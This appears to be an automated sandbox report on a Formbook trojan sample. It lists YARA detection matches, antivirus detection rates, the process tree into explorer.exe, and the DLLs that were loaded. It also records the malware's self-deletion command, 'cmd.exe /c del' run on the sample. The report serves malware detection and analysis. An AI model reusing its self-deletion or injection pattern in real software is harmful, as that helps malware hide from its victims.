          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: TU0kiz3mxz.exe PID: 1928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: TU0kiz3mxz.exe PID: 1148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 3584, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: TU0kiz3mxz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@24/1@12/1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TU0kiz3mxz.exe.logJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
          Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f54c312f-1ac3-4336-8602-9e5aed610bebJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: TU0kiz3mxz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: TU0kiz3mxz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: TU0kiz3mxz.exeVirustotal: Detection: 76%
          Source: TU0kiz3mxz.exeReversingLabs: Detection: 91%
          Source: explorer.exeString found in binary or memory: /LOADSAVEDWINDOWS
          Source: explorer.exeString found in binary or memory: accent-startColorMenu
          Source: explorer.exeString found in binary or memory: accent-startColor
          Source: explorer.exeString found in binary or memory: themes-installTheme
          Source: explorer.exeString found in binary or memory: Microsoft-Windows-Shell-Launcher
          Source: explorer.exeString found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
          Source: unknownProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
          Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
